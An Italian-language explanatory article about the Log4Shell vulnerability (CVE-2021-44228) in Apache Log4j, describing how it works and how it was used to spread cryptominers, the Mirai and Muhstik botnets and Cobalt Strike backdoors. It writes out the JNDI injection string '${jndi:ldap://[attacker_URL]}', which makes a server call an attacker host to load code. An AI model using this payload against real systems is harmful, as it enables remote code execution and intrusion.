Log4Shell Vulnerability

Il 10 dicembre 2021 è stato rilasciato un exploit per una vulnerabilità critica nella piattaforma di registrazione basata su Java Apache Log4jpubblicamente. Tracciata come CVE-2021-44228 o Log4Shell, la vulnerabilità ha un impatto sulle versioni di Log4j da Log4j 2.0-beta9 e fino alla 2.14.1. Gli attori delle minacce possono sfruttare l'exploit per stabilire un accesso remoto non autenticato, eseguire codice, fornire minacce malware o raccogliere informazioni. Alla vulnerabilità viene assegnato uno stato critico poiché Log4j è ampiamente utilizzato dalle applicazioni aziendali e dai servizi cloud.

Dettagli tecnici Log4Shell

L'exploit inizia con l'autore della minaccia che cambia l'agente utente del browser Web. Quindi visitano un sito o cercano una stringa specifica presente sui siti Web con il formato:

${jndi:ldap://[attacker_URL]}

Di conseguenza, la stringa verrà aggiunta ai registri di accesso del server Web. Gli aggressori attendono quindi che l'applicazione Log4j analizzi questi registri e raggiunga la stringa aggiunta. In questo caso, il bug si attiverà, costringendo il server a richiamare l'URL presente nella stringa JNDI. Quell'URL viene abusato per gestire comandi codificati Base64 o classi Javasuccessivamente ed eseguirli sul dispositivo compromesso.

Apache ha rilasciato rapidamente una nuova versione - Log4j 2.15.0, per affrontare e correggere l'exploit, ma una quantità significativa di sistemi vulnerabili potrebbe rimanere senza patch per un lungo periodo. Allo stesso tempo, gli autori delle minacce hanno rapidamente notato la vulnerabilità zero-day di Log4Shell e hanno iniziato a scansionare i server adatti da sfruttare. La comunità di infosec ha monitorato numerose campagne di attacco che utilizzano Log4Shell per fornire un'ampia gamma di minacce malware.

Log4Shell viene utilizzato negli attacchi di Cryptominer, Botnet, backdoor e raccolta dati

Uno dei primi attori delle minacce a implementare Log4Shell nelle loro operazioni sono stati i criminali informatici dietro la botnet di mining di criptovalute Kinsing. Gli hacker hanno utilizzato Log4Shell per fornire payload con codifica Base64 ed eseguire script di shell. Il ruolo di questi script è quello di pulire il sistema preso di mira dalle minacce di mining di criptovalute concorrenti prima che venga eseguito il loro malware Kinsing.

Netlab 360 ha rilevato gli attori delle minacce che utilizzano la vulnerabilità per installare versioni delle botnet Mirai e Muhstik sui dispositivi violati. Queste minacce malware sono progettate per aggiungere sistemi infetti in una rete di dispositivi e server IoT, che gli aggressori possono quindi istruire per lanciare attacchi DDoS (Distributed Denial-of-Service) o distribuire crypto-minersuccessivamente.

Secondo il Microsoft Threat Intelligence Center, anche l'exploit Log4j è stato preso di mira da campagne di attacco che hanno fatto cadere i beacon Cobalt Strike. Cobalt Strike è uno strumento software legittimo utilizzato per i test di penetrazione contro i sistemi di sicurezza di un'azienda.Tuttavia, le sue capacità di backdoor lo hanno reso una parte comune dell'arsenale di numerosi gruppi di attori delle minacce. Successivamente, l'accesso illegale backdoor alla rete della vittima viene utilizzato per fornire payload di livello successivo come ransomware, furti di informazioni e altre minacce malware.

Log4Shell può essere sfruttato per acquisire variabili di ambiente contenenti dati del server. In questo modo, gli aggressori possono accedere al nome dell'host, al nome del sistema operativo, al numero di versione del sistema operativo, al nome utente con cui è in esecuzione il servizio Log4j e altro ancora.